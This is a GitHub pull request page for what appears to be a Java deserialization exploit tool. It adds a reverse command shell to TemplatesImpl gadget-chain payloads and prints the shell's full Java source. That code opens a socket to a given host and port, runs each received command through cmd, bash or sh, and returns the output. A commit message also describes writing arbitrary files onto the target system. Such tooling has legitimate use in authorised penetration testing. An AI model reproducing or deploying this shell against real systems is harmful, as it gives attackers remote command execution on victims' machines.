Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Added reverse shell capability for TemplatesImpl payloads. #96

Open
wants to merge 3 commits into
base: master
Choose a base branch
from

Conversation

NickstaDB
Copy link
Contributor

Added a simple reverse command shell which also supports pipes and redirection shell operators. Works with e.g. a netcat listener. For ease of reading/review the shell code is as follows:

java.net.Socket sck = null;
java.io.OutputStream out;
java.io.BufferedReader rdr;
Process proc;
String cmd = "";
String os = System.getProperty("os.name").toLowerCase(java.util.Locale.ENGLISH);

try {
	sck = new java.net.Socket(java.net.InetAddress.getByName(args[0]), Integer.parseInt(args[1]));
	out = sck.getOutputStream();
	rdr = new java.io.BufferedReader(new java.io.InputStreamReader(sck.getInputStream()));
	
	while(cmd.trim().toLowerCase(java.util.Locale.ENGLISH).equals("exit") == false) {
		try {
			out.write("> ".getBytes(), 0, "> ".getBytes().length);
			cmd = rdr.readLine();
			
			if(cmd.trim().toLowerCase(java.util.Locale.ENGLISH).equals("exit") == false) {
				if(os.contains("win")) {
					proc = new ProcessBuilder("cmd", "/c", "\"" + cmd.trim() + "\"").redirectErrorStream(true).start();
				} else {
					try {
						proc = new ProcessBuilder("/bin/bash", "-c", cmd.trim()).redirectErrorStream(true).start();
					} catch(java.io.IOException ioe) {
						if(ioe.getMessage().contains("Cannot run program")) {
							try {
								proc = new ProcessBuilder("/bin/sh", "-c", cmd.trim()).redirectErrorStream(true).start();
							} catch(java.io.IOException ioe2) {
								if(ioe2.getMessage().contains("Cannot run program")) {
									throw new java.io.IOException("Non-Windows target and neither /bin/bash or /bin/sh is present.");
								} else {
									throw ioe2;
								}
							}
						} else {
							throw ioe;
						}
					}
				}
				
				proc.waitFor();
				byte[] b = new byte[proc.getInputStream().available()];
				proc.getInputStream().read(b);
				out.write(b);
			}
		} catch(Exception ex) {
			out.write(("[-] Exception: " + ex.toString()).getBytes());
		}
	}
	
	sck.close();
} catch(Exception ex) {
	if(sck != null) {
		try {
			sck.close();
		} catch(Exception ex2) {}
	}
}

root and others added 3 commits October 14, 2018 00:03
Implemented support for writing a given file to a given path on the target system when using a TemplatesImpl gadget chain. The file is base64-encoded and included in the serialized payload alongside code that decodes the file and writes it to the given path on the target system.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant